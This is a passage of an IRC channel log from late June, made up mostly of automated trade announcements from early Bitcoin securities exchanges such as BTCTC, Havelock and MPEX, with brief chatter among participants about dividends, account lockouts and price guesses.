did I see that right? AM div is 0.01938069? Jun 26 22:30:04 yes Jun 26 22:30:20 they're losing their edge Jun 26 22:32:20 [HAVELOCK] [HIM] 6 @ 0.3 = 1.8 BTC [+] Jun 26 22:32:44 higher than last week Jun 26 22:33:00 fwiw Jun 26 22:33:43 [BTCTC] [DMS.PURCHASE] 64 @ 0.053794 = 3.4428 BTC [-] Jun 26 22:34:13 Delerium: i'm locked out of every major site now excluding my email for losing my google auth. If i didn't have a cash stash, being that i live off bitcoin, i'd be devastated. Jun 26 22:34:28 MP will get a kick out of that Jun 26 22:35:35 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1991 BTC [-] Jun 26 22:35:37 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1993 BTC [+] Jun 26 22:35:38 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1995 BTC [+] Jun 26 22:35:38 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1999 = 0.9995 BTC [+] Jun 26 22:35:47 [HAVELOCK] [HIM] 10 @ 0.3 = 3 BTC [+] Jun 26 22:36:08 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199999 = 1 BTC [+] Jun 26 22:37:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.033801 BTC [-] Jun 26 22:38:03 [BTCTC] [TAT.ASICMINER] 25 @ 0.033802 = 0.8451 BTC [+] Jun 26 22:38:05 [HAVELOCK] [ASICM] 1 @ 0.033999 BTC [+] Jun 26 22:38:07 [BTCTC] [TAT.ASICMINER] 58 @ 0.033801 = 1.9605 BTC [-] Jun 26 22:39:22 [HAVELOCK] [ASICM] 255 @ 0.034 = 8.67 BTC [+] Jun 26 22:39:23 [HAVELOCK] [ASICM] 58 @ 0.034 = 1.972 BTC [+] Jun 26 22:41:57 [13:30] they're losing their edge <- Only relevant if you think they ever had one. ~0.015-0.018 is much more in accordance with what they should expect considering their plans and goals. Jun 26 22:42:42 2 more weeks, then sell Jun 26 22:42:58 what's that? Jun 26 22:43:05 2 more weeks Jun 26 22:43:08 for sure Jun 26 22:43:41 [BTCTC] [BTC-BOND] 209 @ 0.01 = 2.09 BTC [+] Jun 26 22:43:49 [BTCTC] [S.MPOE-PT] 1 @ 0.000821 BTC [-] Jun 26 22:44:38 [BTCTC] [ASICMINER-PT] 1 @ 3.464875 BTC [+] Jun 26 22:46:05 four more beers Jun 26 22:48:12 [BTCTC] [CRYPTO-TRADE] 7 @ 0.199998 = 1.4 BTC [-] Jun 26 22:53:09 [HAVELOCK] [HIM] 12 @ 0.3 = 3.6 BTC [+] Jun 26 22:53:18 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 22:54:07 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199998 = 0.4 BTC [-] Jun 26 22:54:44 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 22:58:24 [BTCTC] [DMS.MINING] 17 @ 0.019801 = 0.3366 BTC [-] Jun 26 22:58:26 [BTCTC] [DMS.MINING] 2 @ 0.0198 = 0.0396 BTC [-] Jun 26 22:59:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.033813 = 0.2705 BTC [+] Jun 26 23:00:03 [BTCTC] [ASICMINER-PT] 1 @ 3.391002 BTC [-] Jun 26 23:00:05 [BTCTC] [ASICMINER-PT] 1 @ 3.391001 BTC [-] Jun 26 23:00:16 [BTCTC] [ASICMINER-PT] 1 @ 3.391 BTC [-] Jun 26 23:00:22 [BTCTC] [ASICMINER-PT] 1 @ 3.390016 BTC [-] Jun 26 23:00:42 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 23:00:46 [BTCTC] [TAT.ASICMINER] 46 @ 0.033813 = 1.5554 BTC [+] Jun 26 23:00:47 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199001 BTC [-] Jun 26 23:01:12 [BTCTC] [ASICMINER-PT] 1 @ 3.464858 BTC [+] Jun 26 23:01:18 [BTCTC] [ASICMINER-PT] 3 @ 3.3834 = 10.1502 BTC [-] Jun 26 23:01:22 [BTCTC] [ASICMINER-PT] 2 @ 3.383 = 6.766 BTC [-] Jun 26 23:01:24 [BTCTC] [ASICMINER-PT] 1 @ 3.382 BTC [-] Jun 26 23:01:58 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 23:02:14 [BTCTC] [DMS.MINING] 21 @ 0.020194 = 0.4241 BTC [+] Jun 26 23:02:17 [BTCTC] [BASIC-MINING] 1 @ 1.78765 BTC [-] Jun 26 23:02:19 [BTCTC] [BASIC-MINING] 1 @ 1.876529 BTC [+] Jun 26 23:02:20 [BTCTC] [BASIC-MINING] 1 @ 1.879 BTC [+] Jun 26 23:02:22 [BTCTC] [BASIC-MINING] 2 @ 1.88 = 3.76 BTC [+] Jun 26 23:04:55 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00489 = 0.0098 BTC [-] Jun 26 23:04:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00471 BTC [-] Jun 26 23:04:58 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00433 = 0.0433 BTC [-] Jun 26 23:04:59 [BTCTC] [TAT.VIRTUALMINE] 85 @ 0.004323 = 0.3675 BTC [-] Jun 26 23:05:00 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004322 = 0.0216 BTC [-] Jun 26 23:05:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004322 = 0.0432 BTC [-] Jun 26 23:05:02 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.004321 = 0.1901 BTC [-] Jun 26 23:05:03 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.004174 = 0.3131 BTC [-] Jun 26 23:05:04 [BTCTC] [TAT.VIRTUALMINE] 68 @ 0.0041 = 0.2788 BTC [-] Jun 26 23:05:46 [BTCTC] [DMS.MINING] 9 @ 0.020191 = 0.1817 BTC [-] Jun 26 23:05:48 [BTCTC] [DMS.MINING] 14 @ 0.0202 = 0.2828 BTC [+] Jun 26 23:05:49 [BTCTC] [DMS.MINING] 35 @ 0.021 = 0.735 BTC [+] Jun 26 23:06:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.034448 BTC [+] Jun 26 23:06:08 [BTCTC] [DMS.MINING] 2 @ 0.0212 = 0.0424 BTC [+] Jun 26 23:06:49 [HAVELOCK] [ASICM] 107 @ 0.03428 = 3.668 BTC [+] Jun 26 23:10:29 [BTCTC] [DMS.PURCHASE] 2 @ 0.053794 = 0.1076 BTC [-] Jun 26 23:11:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0344 BTC [-] Jun 26 23:11:12 [HAVELOCK] [ASICM] 2 @ 0.03428 = 0.0686 BTC [+] Jun 26 23:12:00 [HAVELOCK] [HIM] 16 @ 0.29 = 4.64 BTC [-] Jun 26 23:12:02 [HAVELOCK] [HIM] 54 @ 0.289001 = 15.6061 BTC [-] Jun 26 23:12:03 [HAVELOCK] [HIM] 10 @ 0.285 = 2.85 BTC [-] Jun 26 23:13:41 [MPEX] [S.MPOE] 3600 @ 0.00080506 = 2.8982 BTC [-] Jun 26 23:16:18 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 26 23:19:30 [HAVELOCK] [ASICM] 2 @ 0.0342799 = 0.0686 BTC [-] Jun 26 23:20:12 [HAVELOCK] [ASICM] 1 @ 0.0342799 BTC [-] Jun 26 23:22:25 [HAVELOCK] [ASICM] 1 @ 0.0342799 BTC [-] Jun 26 23:25:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.034384 BTC [-] Jun 26 23:25:51 [BTCTC] [COGNITIVE] 1 @ 0.36985 BTC [+] Jun 26 23:25:53 [BTCTC] [COGNITIVE] 4 @ 0.369851 = 1.4794 BTC [+] Jun 26 23:26:14 [HAVELOCK] [ASICM] 1 @ 0.034279 BTC [-] Jun 26 23:27:30 [BTCTC] [BASIC-MINING] 1 @ 1.781001 BTC [-] Jun 26 23:28:20 [BTCTC] [S.MPOE-PT] 2 @ 0.001079 = 0.0022 BTC [+] Jun 26 23:28:22 [BTCTC] [S.MPOE-PT] 1 @ 0.00108 BTC [+] Jun 26 23:28:23 [BTCTC] [S.MPOE-PT] 1 @ 0.0011 BTC [+] Jun 26 23:28:24 [BTCTC] [S.MPOE-PT] 2 @ 0.00113 = 0.0023 BTC [+] Jun 26 23:33:33 [HAVELOCK] [ASICM] 3 @ 0.033036 = 0.0991 BTC [-] Jun 26 23:33:34 [HAVELOCK] [ASICM] 1 @ 0.033035 BTC [-] Jun 26 23:33:35 [HAVELOCK] [ASICM] 133 @ 0.033034 = 4.3935 BTC [-] Jun 26 23:33:37 [HAVELOCK] [ASICM] 163 @ 0.033033 = 5.3844 BTC [-] Jun 26 23:33:47 just-dice chat has resorted to buttsex pricing requests Jun 26 23:35:47 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 23:40:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.034367 = 0.1375 BTC [-] Jun 26 23:42:50 [BTCTC] [B.YABMC] 1 @ 0.012 BTC [-] Jun 26 23:43:00 [MPEX] [S.MPOE] 8181 @ 0.00080537 = 6.5887 BTC [+] Jun 26 23:43:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.033901 = 0.2034 BTC [-] Jun 26 23:43:14 [BTCTC] [TAT.ASICMINER] 7 @ 0.0339 = 0.2373 BTC [-] Jun 26 23:43:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.03382 = 0.0676 BTC [-] Jun 26 23:43:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.033816 BTC [-] Jun 26 23:43:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.033815 = 0.6763 BTC [-] Jun 26 23:43:20 [BTCTC] [TAT.ASICMINER] 48 @ 0.033814 = 1.6231 BTC [-] Jun 26 23:43:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.03381 = 0.1352 BTC [-] Jun 26 23:43:22 [BTCTC] [TAT.ASICMINER] 62 @ 0.0337 = 2.0894 BTC [-] Jun 26 23:49:46 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 23:52:34 [BTCTC] [BITVPS] 1 @ 0.00115 BTC [+] Jun 26 23:53:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.034345 = 0.0687 BTC [+] Jun 26 23:55:13 [HAVELOCK] [SDICE] 10 @ 0.185201 = 1.852 BTC [-] Jun 26 23:57:01 [HAVELOCK] [ASICM] 24 @ 0.034 = 0.816 BTC [+] Jun 26 23:58:27 [MPEX] [S.MPOE] 8066 @ 0.00081112 = 6.5425 BTC [+] Jun 26 23:58:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.034337 BTC [-] Jun 27 00:01:18 [BTCTC] [DMS.MINING] 4 @ 0.0211 = 0.0844 BTC [-] Jun 27 00:02:35 [BTCTC] [TAT.ASICMINER] 30 @ 0.034333 = 1.03 BTC [-] Jun 27 00:04:07 [MPEX] [S.MPOE] 6697 @ 0.00081204 = 5.4382 BTC [+] Jun 27 00:04:11 [MPEX] [S.MPOE] 11603 @ 0.00081304 = 9.4337 BTC [+] Jun 27 00:04:40 [BTCTC] [ASICMINER-PT] 5 @ 3.44 = 17.2 BTC [+] Jun 27 00:04:55 [HAVELOCK] [ASICM] 1 @ 0.03427777 BTC [+] Jun 27 00:05:09 [HAVELOCK] [ASICM] 1 @ 0.03427777 BTC [+] Jun 27 00:07:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.034328 BTC [-] Jun 27 00:09:35 [MPEX] [S.MPOE] 17434 @ 0.00081142 = 14.1463 BTC [-] Jun 27 00:09:36 [MPEX] [S.MPOE] 10564 @ 0.00081023 = 8.5593 BTC [-] Jun 27 00:12:13 [BTCTC] [TAT.ASICMINER] 8 @ 0.034323 = 0.2746 BTC [-] Jun 27 00:14:35 [HAVELOCK] [VTX] 12 @ 0.45 = 5.4 BTC [-] Jun 27 00:21:19 [HAVELOCK] [SDICE] 30 @ 0.185201 = 5.556 BTC [-] Jun 27 00:24:28 [BTCTC] [BITVPS] 24 @ 0.001101 = 0.0264 BTC [-] Jun 27 00:24:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199998 BTC [+] Jun 27 00:24:56 [HAVELOCK] [ASICM] 136 @ 0.034 = 4.624 BTC [-] Jun 27 00:25:26 [MPEX] [S.DICE] 2000 @ 0.002 = 4 BTC [-] Jun 27 00:25:27 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [+] Jun 27 00:25:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.0342 = 0.0684 BTC [-] Jun 27 00:26:08 [BTCTC] [ASICMINER-PT] 1 @ 3.411601 BTC [-] Jun 27 00:26:18 [BTCTC] [CRYPTO-TRADE] 9 @ 0.199999 = 1.8 BTC [+] Jun 27 00:28:23 [BTCTC] [RSM] 1 @ 0.022978 BTC [-] Jun 27 00:28:25 [BTCTC] [RSM] 1 @ 0.022978 BTC [-] Jun 27 00:28:31 [MPEX] [S.DICE] 100 @ 0.00215 = 0.215 BTC [+] Jun 27 00:29:42 Asicminer gonna tank hard Jun 27 00:29:42 [BTCTC] [RSM] 8 @ 0.023 = 0.184 BTC [+] Jun 27 00:29:42 arij: why that ? Jun 27 00:29:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.034196 BTC [-] Jun 27 00:29:46 [BTCTC] [RSM] 92 @ 0.0241 = 2.2172 BTC [+] Jun 27 00:30:27 [BTCTC] [ASICMINER-PT] 2 @ 3.4116 = 6.8232 BTC [-] Jun 27 00:31:01 Just a guess Jun 27 00:31:08 More of an educated guess Jun 27 00:31:20 [BTCTC] [BASIC-MINING] 2 @ 1.876436 = 3.7529 BTC [+] Jun 27 00:32:32 [BTCTC] [ASICMINER-PT] 1 @ 3.4113 BTC [-] Jun 27 00:32:38 [BTCTC] [ASICMINER-PT] 5 @ 3.411001 = 17.055 BTC [-] Jun 27 00:33:12 [BTCTC] [TAT.ASICMINER] 80 @ 0.034192 = 2.7354 BTC [-] Jun 27 00:33:32 [BTCTC] [ASICMINER-PT] 2 @ 3.45 = 6.9 BTC [+] Jun 27 00:33:34 [BTCTC] [ASICMINER-PT] 3 @ 3.458899 = 10.3767 BTC [+] Jun 27 00:33:50 [MPEX] [S.MPOE] 3100 @ 0.00081304 = 2.5204 BTC [+] Jun 27 00:34:00 [BTCTC] [ASICMINER-PT] 1 @ 3.411001 BTC [-] Jun 27 00:34:07 [BTCTC] [RSM] 1 @ 0.0241 BTC [+] Jun 27 00:34:17 [BTCTC] [ASICMINER-PT] 2 @ 3.458898 = 6.9178 BTC [+] Jun 27 00:34:19 ohai Jun 27 00:35:34 [BTCTC] [ASICMINER-PT] 1 @ 3.458978 BTC [+] Jun 27 00:35:43 [BTCTC] [TAT.ASICMINER] 111 @ 0.033803 = 3.7521 BTC [-] Jun 27 00:38:44 [HAVELOCK] [VTX] 3 @ 0.4898 = 1.4694 BTC [+] Jun 27 00:38:46 [HAVELOCK] [VTX] 1 @ 0.489998 BTC [+] Jun 27 00:38:47 [HAVELOCK] [VTX] 2 @ 0.4976 = 0.9952 BTC [+] Jun 27 00:38:48 [HAVELOCK] [VTX] 2 @ 0.4978 = 0.9956 BTC [+] Jun 27 00:38:49 [HAVELOCK] [VTX] 13 @ 0.498 = 6.474 BTC [+] Jun 27 00:41:24 [HAVELOCK] [ASICM] 3 @ 0.03427677 = 0.1028 BTC [+] Jun 27 00:53:11 I thought AM are just about to start shipping again Jun 27 00:53:25 last two divs have been mining only Jun 27 00:53:57 shipping what? Jun 27 00:59:53 [BTCTC] [TAT.VIRTUALMINE] 212 @ 0.004737 = 1.0042 BTC [+] Jun 27 00:59:54 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.004738 = 0.18 BTC [+] Jun 27 01:00:20 [BTCTC] [TAT.ASICMINER] 19 @ 0.034164 = 0.6491 BTC [+] Jun 27 01:04:38 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 27 01:10:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004735 BTC [-] Jun 27 01:11:17 [HAVELOCK] [VTX] 8 @ 0.498 = 3.984 BTC [+] Jun 27 01:11:18 [HAVELOCK] [VTX] 5 @ 0.499 = 2.495 BTC [+] Jun 27 01:12:49 [BTCTC] [S.MPOE-PT] 3 @ 0.001 = 0.003 BTC [-] Jun 27 01:14:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.034149 BTC [-] Jun 27 01:14:19 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [-] Jun 27 01:18:31 [MPEX] [S.MPOE] 7600 @ 0.00081304 = 6.1791 BTC [+] Jun 27 01:22:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.03415 BTC [+] Jun 27 01:23:25 [HAVELOCK] [ASICM] 5 @ 0.034 = 0.17 BTC [-] Jun 27 01:24:04 [HAVELOCK] [ASICM] 8 @ 0.03427677 = 0.2742 BTC [+] Jun 27 01:24:19 [BTCTC] [BITVPS] 1 @ 0.001257 BTC [+] Jun 27 01:24:27 -tomaw- [Global Notice] Hi all, we just experienced a little unexpected issue with the webchat resulting in all its users being momentarily kicked off the service. It's back working correctly now. Sorry for the inconvenience! Jun 27 01:35:38 [MPEX] [S.MPOE] 664 @ 0.00081304 = 0.5399 BTC [+] Jun 27 01:35:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.0341 = 0.1023 BTC [-] Jun 27 01:36:35 [BTCTC] [S.MPOE-PT] 4 @ 0.001 = 0.004 BTC [-] Jun 27 01:37:14 [HAVELOCK] [ASICM] 8 @ 0.03427677 = 0.2742 BTC [+] Jun 27 01:37:48 [BTCTC] [TAT.ASICMINER] 31 @ 0.03381 = 1.0481 BTC [-] Jun 27 01:39:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.033803 = 0.2366 BTC [-] Jun 27 01:39:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.0338 = 0.1014 BTC [-] Jun 27 01:44:45 [BTCTC] [TAT.ASICMINER] 31 @ 0.03381 = 1.0481 BTC [+] Jun 27 01:49:01 [BTCTC] [TAT.ASICMINER] 29 @ 0.03373 = 0.9782 BTC [-] Jun 27 01:49:34 [HAVELOCK] [ASICM] 1 @ 0.03427576 BTC [-] Jun 27 01:51:34 [HAVELOCK] [ASICM] 113 @ 0.03427576 = 3.8732 BTC [-] Jun 27 01:51:53 [BTCTC] [TAT.ASICMINER] 43 @ 0.033711 = 1.4496 BTC [-] Jun 27 01:52:21 [HAVELOCK] [ASICM] 58 @ 0.03427676 = 1.9881 BTC [+] Jun 27 01:53:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.034145 = 0.4439 BTC [+] Jun 27 01:53:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.034146 BTC [+] Jun 27 01:54:06 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jun 27 01:55:17 [BTCTC] [BITVPS] 7 @ 0.001251 = 0.0088 BTC [-] Jun 27 01:55:48 [BTCTC] [ASICMINER-PT] 1 @ 3.439 BTC [-] Jun 27 01:55:52 [BTCTC] [ASICMINER-PT] 1 @ 3.449 BTC [+] Jun 27 01:56:45 [MPEX] [S.MPOE] 2643 @ 0.00081333 = 2.1496 BTC [+] Jun 27 01:59:34 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [-] Jun 27 02:00:01 [BTCTC] [ASICMINER-PT] 1 @ 3.412308 BTC [-] Jun 27 02:01:11 [BTCTC] [BASIC-MINING] 1 @ 1.876442 BTC [+] Jun 27 02:01:13 [BTCTC] [BASIC-MINING] 1 @ 1.9 BTC [+] Jun 27 02:01:54 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 27 02:02:56 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.004717 = 0.1698 BTC [-] Jun 27 02:03:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.034135 BTC [-] Jun 27 02:04:17 [HAVELOCK] [ASICM] 1 @ 0.03427599 BTC [+] Jun 27 02:04:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004717 BTC [-] Jun 27 02:05:21 [BTCTC] [RSM] 1 @ 0.021101 BTC [-] Jun 27 02:05:23 [BTCTC] [RSM] 1 @ 0.021101 BTC [-] Jun 27 02:05:25 [BTCTC] [RSM] 1 @ 0.0211 BTC [-] Jun 27 02:05:27 [BTCTC] [RSM] 25 @ 0.021004 = 0.5251 BTC [-] Jun 27 02:05:30 [BTCTC] [RSM] 72 @ 0.021002 = 1.5121 BTC [-] Jun 27 02:07:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.034138 BTC [+] Jun 27 02:08:04 [BTCTC] [RSM] 1 @ 0.0241 BTC [+] Jun 27 02:09:05 [MPEX] [S.MPOE] 16300 @ 0.00081618 = 13.3037 BTC [+] Jun 27 02:09:07 [MPEX] [S.MPOE] 8417 @ 0.00081642 = 6.8718 BTC [+] Jun 27 02:09:10 [MPEX] [S.MPOE] 2114 @ 0.00081766 = 1.7285 BTC [+] Jun 27 02:09:14 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.004719 = 0.0378 BTC [+] Jun 27 02:09:17 [MPEX] [S.MPOE] 6769 @ 0.00081819 = 5.5383 BTC [+] Jun 27 02:11:11 [HAVELOCK] [ASICM] 17 @ 0.0342 = 0.5814 BTC [-] Jun 27 02:12:43 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [+] Jun 27 02:14:26 [HAVELOCK] [ASICM] 1 @ 0.0342 BTC [-] Jun 27 02:14:31 [HAVELOCK] [ASICM] 5 @ 0.0342 = 0.171 BTC [-] Jun 27 02:15:13 [BTCTC] [TAT.ASICMINER] 8 @ 0.034137 = 0.2731 BTC [-] Jun 27 02:15:51 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [-] Jun 27 02:16:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004719 BTC [+] Jun 27 02:17:33 [BTCTC] [TAT.ASICMINER] 15 @ 0.034139 = 0.5121 BTC [+] Jun 27 02:18:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.034139 BTC [+] Jun 27 02:18:24 [HAVELOCK] [HIM] 6 @ 0.299999 = 1.8 BTC [+] Jun 27 02:20:37 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.004719 = 0.1935 BTC [+] Jun 27 02:20:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.034139 = 0.1024 BTC [+] Jun 27 02:21:18 [BTCTC] [S.BBET-PT] 11 @ 0.001767 = 0.0194 BTC [+] Jun 27 02:22:45 [BTCTC] [S.MPOE-PT] 1 @ 0.001 BTC [-] Jun 27 02:23:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.034146 = 0.1024 BTC [+] Jun 27 02:23:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.034139 = 0.6828 BTC [-] Jun 27 02:23:56 [BTCTC] [TAT.ASICMINER] 28 @ 0.034139 = 0.9559 BTC [-] Jun 27 02:24:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.034139 = 0.0683 BTC [-] Jun 27 02:24:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.034139 BTC [-] Jun 27 02:25:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.034139 = 0.4097 BTC [-] Jun 27 02:26:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005098 BTC [+] Jun 27 02:26:41 [BTCTC] [TAT.ASICMINER] 21 @ 0.034139 = 0.7169 BTC [-] Jun 27 02:26:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.034139 = 0.239 BTC [-] Jun 27 02:27:19 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [+] Jun 27 02:27:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.033904 = 0.1695 BTC [-] Jun 27 02:27:24 [BTCTC] [TAT.ASICMINER] 12 @ 0.033903 = 0.4068 BTC [-] Jun 27 02:27:27 [BTCTC] [CRYPTO-TRADE] 18 @ 0.199999 = 3.6 BTC [+] Jun 27 02:27:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [-] Jun 27 02:27:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.03373 = 0.1349 BTC [-] Jun 27 02:27:32 [BTCTC] [TAT.ASICMINER] 23 @ 0.033721 = 0.7756 BTC [-] Jun 27 02:28:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.034138 = 0.1707 BTC [+] Jun 27 02:28:17 [BTCTC] [ASICMINER-PT] 1 @ 3.416 BTC [-] Jun 27 02:28:22 [BTCTC] [ASICMINER-PT] 1 @ 3.416 BTC [-] Jun 27 02:28:25 [BTCTC] [ASICMINER-PT] 4 @ 3.412308 = 13.6492 BTC [-] Jun 27 02:28:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.034138 = 0.1707 BTC [+] Jun 27 02:28:53 [BTCTC] [ASICMINER-PT] 1 @ 3.412306 BTC [-] Jun 27 02:29:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.034137 BTC [-] Jun 27 02:33:24 [BTCTC] [PAJKA.BOND] 1 @ 0.069 BTC [-] Jun 27 02:33:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.034126 BTC [-] Jun 27 02:34:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.034119 = 0.2047 BTC [-] Jun 27 02:34:46 [BTCTC] [ASICMINER-PT] 2 @ 3.412309 = 6.8246 BTC [+] Jun 27 02:35:01 [BTCTC] [DMS.PURCHASE] 5 @ 0.053794 = 0.269 BTC [-] Jun 27 02:35:42 [BTCTC] [DMS.MINING] 1 @ 0.02119 BTC [+] Jun 27 02:37:15 [BTCTC] [TAT.ASICMINER] 33 @ 0.033728 = 1.113 BTC [-] Jun 27 02:38:07 [BTCTC] [ASICMINER-PT] 3 @ 3.412309 = 10.2369 BTC [+] Jun 27 02:39:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.034101 = 0.2046 BTC [+] Jun 27 02:39:18 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.005098 = 0.2294 BTC [+] Jun 27 02:39:45 [BTCTC] [BASIC-MINING] 2 @ 1.95 = 3.9 BTC [+] Jun 27 02:40:20 [BTCTC] [TAT.VIRTUALMINE] 85 @ 0.005099 = 0.4334 BTC [+] Jun 27 02:41:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.034001 = 0.102 BTC [-] Jun 27 02:42:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00509 BTC [-] Jun 27 02:42:56 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.00509 = 0.1222 BTC [-] Jun 27 02:42:57 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.005101 = 0.1275 BTC [+] Jun 27 02:43:50 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.005198 = 0.2079 BTC [+] Jun 27 02:43:56 [BTCTC] [ASICMINER-PT] 5 @ 3.447891 = 17.2395 BTC [+] Jun 27 02:45:48 [BTCTC] [TAT.ASICMINER] 22 @ 0.034013 = 0.7483 BTC [+] Jun 27 02:45:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.034013 BTC [+] Jun 27 02:47:26 [BTCTC] [ASICMINER-PT] 1 @ 3.4479 BTC [+] Jun 27 02:47:28 [BTCTC] [ASICMINER-PT] 1 @ 3.448 BTC [+] Jun 27 02:47:29 [BTCTC] [ASICMINER-PT] 1 @ 3.4489 BTC [+] Jun 27 02:47:31 [BTCTC] [ASICMINER-PT] 5 @ 3.45 = 17.25 BTC [+] Jun 27 02:47:32 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [+] Jun 27 02:47:34 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [+] Jun 27 02:47:35 [BTCTC] [ASICMINER-PT] 1 @ 3.4629 BTC [+] Jun 27 02:47:37 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [+] Jun 27 02:47:38 [BTCTC] [ASICMINER-PT] 2 @ 3.465 = 6.93 BTC [+] Jun 27 02:47:40 [BTCTC] [ASICMINER-PT] 1 @ 3.467 BTC [+] Jun 27 02:47:41 [BTCTC] [ASICMINER-PT] 1 @ 3.467 BTC [+] Jun 27 02:47:42 [BTCTC] [ASICMINER-PT] 5 @ 3.4735 = 17.3675 BTC [+] Jun 27 02:47:43 [BTCTC] [ASICMINER-PT] 4 @ 3.4796 = 13.9184 BTC [+] Jun 27 02:47:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.034013 BTC [+] Jun 27 02:49:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.034013 = 0.2381 BTC [+] Jun 27 02:49:08 [BTCTC] [TAT.ASICMINER] 31 @ 0.034127 = 1.0579 BTC [+] Jun 27 02:49:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.034136 = 0.6827 BTC [+] Jun 27 02:50:06 [BTCTC] [TAT.ASICMINER] 48 @ 0.0342 = 1.6416 BTC [+] Jun 27 02:51:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03451 BTC [+] Jun 27 02:52:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.03451 = 0.1726 BTC [+] Jun 27 02:52:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.03451 = 0.3106 BTC [+] Jun 27 02:54:54 [HAVELOCK] [ASICM] 1 @ 0.03419999 BTC [-] Jun 27 02:57:52 [MPEX] [S.MPOE] 10857 @ 0.00081389 = 8.8364 BTC [-] Jun 27 02:57:57 [MPEX] [S.MPOE] 2730 @ 0.00081311 = 2.2198 BTC [-] Jun 27 02:58:00 [MPEX] [S.MPOE] 9605 @ 0.00081169 = 7.7963 BTC [-] Jun 27 02:58:01 [MPEX] [S.MPOE] 6808 @ 0.00081023 = 5.516 BTC [-] Jun 